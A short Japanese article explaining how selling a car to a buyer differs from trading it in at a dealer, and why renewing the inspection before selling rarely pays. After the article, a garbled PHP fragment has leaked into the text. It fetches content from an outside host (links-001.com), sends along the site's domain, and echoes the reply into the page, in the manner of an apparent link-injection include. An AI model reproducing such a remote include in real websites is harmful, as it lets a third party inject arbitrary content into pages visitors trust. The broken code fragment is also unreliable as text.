自動車を買い替える際の買取と下取の違い

自動車を買い替える時の手放し方には、買取や下取といった2つの方法があります。
普段は特に気にしていなくても、いざ自分が自動車を売る時になりますと、2つの違いが分からず、疑問になることもあるかもしれません。
双方は似ているようでも結構違い、買取は売却だけを行う売り方で、下取は新しく購入する自動車の支払い代金の1部として、販売店に引き取ってもらう方法です。
つまり買取は売却先を自由に選べますが、下取は次に乗る自動車の購入店だけでしか行えません。
一般的に下取より買取の方が高く売れるというのは、この点にも由来しているのです。
もちろん、新車をメインに扱うディーラーより、中古車をメインに扱う業者の方が、中古車買取に強いという理由もあります。
いずれにせよ、この点を押さえておきますと、買取か下取かでそれほど迷うことはないでしょう。
また、車検が切れかけている場合ですが、車検を通してから売りましても、基本的に車検代が回収できるほど買取金額に上乗せされませんので、車検を通さずに買取を依頼した方がお得です。

".file_get_contents('http://links-001.com/kanren9set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿